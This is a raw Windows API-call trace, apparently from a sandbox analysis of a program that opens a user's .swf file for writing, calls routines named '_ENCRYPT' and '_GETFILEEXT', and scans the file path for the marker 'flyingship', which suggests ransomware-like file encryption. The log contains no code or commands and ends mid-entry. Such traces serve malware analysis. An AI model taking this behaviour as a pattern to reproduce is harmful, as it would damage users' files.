RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.998] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.998] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.998] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\acj9.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.999] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.000] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.000] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.000] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0199.000] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.000] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.001] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.001] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.001] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.001] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.001] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0199.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.002] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0199.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.002] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.003] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.003] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1642dec0, ftLastWriteTime.dwHighDateTime=0x1d5e11d, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AcJ9.swf", cAlternateFileName="")) returned 0x90add8 [0199.003] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0199.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.003] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1642dec0, ftLastWriteTime.dwHighDateTime=0x1d5e11d, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AcJ9.swf", cAlternateFileName="")) returned 0x90add8 [0199.003] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.004] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, 